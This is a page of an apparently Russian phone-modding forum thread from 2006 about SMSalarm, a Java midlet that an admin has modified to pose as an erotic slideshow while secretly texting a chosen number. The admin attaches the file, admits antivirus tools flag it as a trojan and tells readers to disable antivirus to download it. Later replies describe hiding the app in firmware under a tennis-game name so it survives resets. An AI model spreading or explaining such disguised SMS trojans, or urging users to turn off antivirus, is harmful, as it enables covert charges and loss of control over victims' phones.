| |
|
Страница 2 из 8: « 1 [2] 3 4 5 6 ... 8 »
|
Zormax
Admin
Регистрация: 12.12.05 Сообщений: 5826 Репутация: 5274 Откуда: Nizhniy Novgorod
|
#11 [12.07.06, 12:54] SMSalarm в работе
Как известно для большинства телефонов других моделей есть возможнось отсылать скрытно SMS сообщения. До недавнего времени в SE такого нельзя было сделать, т.к. инженеры компании подошли более серьезно к правам приложения.
С выходом патчей игнорирования "Полномочия" для явы, такая возможность появилась.
Ниже прикрепил измененый мною мидлет SMSalarm, который закомуфлирован под эротическое слайд-шоу.
После запуска мидлета, пока вы смотрите картинки, идет отправление на определеный номер СМС`ки с нужным текстом.
Установка приложения через JAD, но перед этим надо в JAD файле прописать свой номер (заместо 911, писать через 8 а не +7) и нужный текст (желательно латинсикй).
Зачем все это нужно?
1. Если у вас украдут телефон и у вас стоит патч и мидлет, то есть шанс что грабитель позарится на заманчивое название и запустит это слайд-шоу, тем самым вам станет известен номер грабителя (если он вставит свою симку).
2. Для отсылки скрытных сообщений. К сожалению плохие люди могут воспользоваться этим, чтобы выкачать с вас деньги, например в обменник разместят, а вы скачаете и запустите.......
Предупрежден, значит вооружен (с)
ВНИМАНИЕ!!! Ваш антивирусник (Каспер, Веб, НОД и т.д.) будет ругаться и говорить что там троян. Это связано с анализом антивирусника на вредноносное ПО. В принципе, т.к. программа отсылает СМС, это и является вредноносным ПО. Это не позволит Вам скачать. Для скачки отключите антивирус потом качайте. Вы можете неповерить и подумать что Вам трояна впаривают, это Ваши проблемы. Больше не просим выслать на мыло или на другой файлообменник кинуть. Антивирус и от туда не даст Вам скачать.
Прикрепленный к сообщению файл: smsalarm.zip ( 193.57 kb; 2306 hits) Скачать файл
TOOKY T83 (1.3.1-L2), MK808B
|
YaRiSs
Expert
Регистрация: 13.5.06 Сообщений: 1029 Репутация: 25 Откуда: Королёв
|
#12 [17.07.06, 21:17] Re: SMSalarm в работе
Да я то вижу переправил, прога лежит в играх! Все равно ни фига!!! А ты сам пробывал?
Samsung I8910(custom-rom)+SE W850I
|
Zormax
Admin
|
#13 [17.07.06, 21:20] Re: SMSalarm в работе
YAR нет, у меня нет времени потом все восстанавливать...
|
YaRiSs
Expert
|
#14 [17.07.06, 22:42] Re: SMSalarm в работе
Эта прога канеш хорошо, но есть и другие, которые смс шлют на платные сайты и со счета лавэ снимают(если у вас канеш стоит патч на Игнорирование полномочий ява, не сертификат Халмера)!
|
Zormax
Admin
|
#15 [17.07.06, 22:50] Re: SMSalarm в работе
Я свой обменник защитил от таких "ложных" файлов. Так что шансов что они появятся и наткнуться на них мало (ну если конечно не выйдет какой нить новый алгоритм)...
|
anonymous
|
#16 [17.07.06, 23:28] Re: SMSalarm в работе
Я перешил тел , заодно и свои приложения прописал: Прошил main и fs без финализации. НЕ ВКЛЮЧАЛ тел !!! Слил через плагин default.xml, отредактировал его (<midlet deletable="false" upgradeable="true" install="false" ...). Залил обратно, ну и jar и jad файлы в папку default/java тоже..Заодно и папку custom для финализации.. ВСЕ. Один минус - теперь эту яву можно удалить только через плагин. Если потом опять что-нибудь изменить в default (уже после включения ), то ничего не происходит
|
soer
Новичок
|
#17 [17.07.06, 23:42] Re: SMSalarm в работе
Я свой обменник защитил от таких "ложных" файлов. Так что шансов что они появятся и наткнуться на них мало (ну если конечно не выйдет какой нить новый алгоритм)... Одно время весь обменник был завален этой байдой с разными названиями. Когда я в своём 750м убивал мобипринт и теннис,заметил,что кроме как в папке ams их нигде небыло,такая же ерунда и со стандартной темой. Файлы лежат в юзерской директории с атрибутом редонли и при общем сбросе не удоляются (стоит вспомнить хитрый файл layout,который без редонли улетает вместе с экраном ) А сменить имя в манифесте и в джаде не трудно. Патч на яву я имел ввиду про запросы,ещё бы он отменял как сертификат через меню,а так больно стрёмно
|
Zormax
Admin
|
#18 [17.07.06, 23:54] Re: SMSalarm в работе
soerОдно время весь обменник был завален этой байдой с разными названиями. Все почистил и поставил алгоритм проверки на эту гадость...
|
YaRiSs
Expert
|
#19 [18.07.06, 01:10] Re: SMSalarm в работе
Даже матом ругаться не хочется, это чтож получается, чтобы прописать любое приложение надо лить новую Фс?? Желающих нет прошить Фс?, а потом до комплита скинуть сюда папку дефолт?
|
Reb
Вникающий
Регистрация: 18.7.06 Сообщений: 50 Репутация: 0 Откуда: Белогорск
|
#20 [16.08.06, 20:59] Re: SMSalarm в работе
Так. Если кому надо, то вот как сделать, чтобы приложение не удалялось после МР(на моём примере): 1) Заливаете новую FS(Я использовал сетул) 2) Не включайте телефон после залития FS 3) Открываете плагином FS и закидываете в дирректорий \tpa\preset\default\java файлы superrealtennis.jar и superrealtennis.jad(прилепляю их.не забудьте снести старый теннис, я предпочитаю сначала удалять, потом трамбовать) 4) заливаете всякие сертификаты, чтобы тел нормально включился 5) включаете тел. можете проверить, после МР у меня осталось нужное нам приложение. УСЁ. Только мне так кажется, что после МР приложение остаётся, но перестаёт остылать смс. Вообще после МР из дирректория \tpa\preset\default\java сносится всё, а интересующее нас приложение переносится сюда: \tpa\preset\system\ams Ну в общем проверьте, отсылает ли прога смс после МР(у меня желания, как такового, нет сейчас это делать). ЗЫ. не забудьте в superrealtennis.jad в строчке "alarmphone: 911" вместо 911 вписать нужный номер YARнужно ли выложить папку default? Я её скопировал сразу после прошивания FS.
Прикрепленный к сообщению файл: smsalarm.rar ( 170.32 kb; 101 hits) Скачать файл
К750 - Философия общения...
|
Lekseich
Новичок
|
#21 [31.08.06, 23:28] Re: SMSalarm в работе
Народ извините меня за возможно глупый вопрос Подскажите как поставить прогу эту в тел ? ТАМ 2 ФАЙЛА JAD И JAR. и ЧТО ЗНАЧИТ.Установка приложения через JAD???пОМОГИТЕ ПОЖАЛУСТА.зАРАНЕЕ БЛАГОДАРЕН
|
Страница 2 из 8: « 1 [2] 3 4 5 6 ... 8 » | |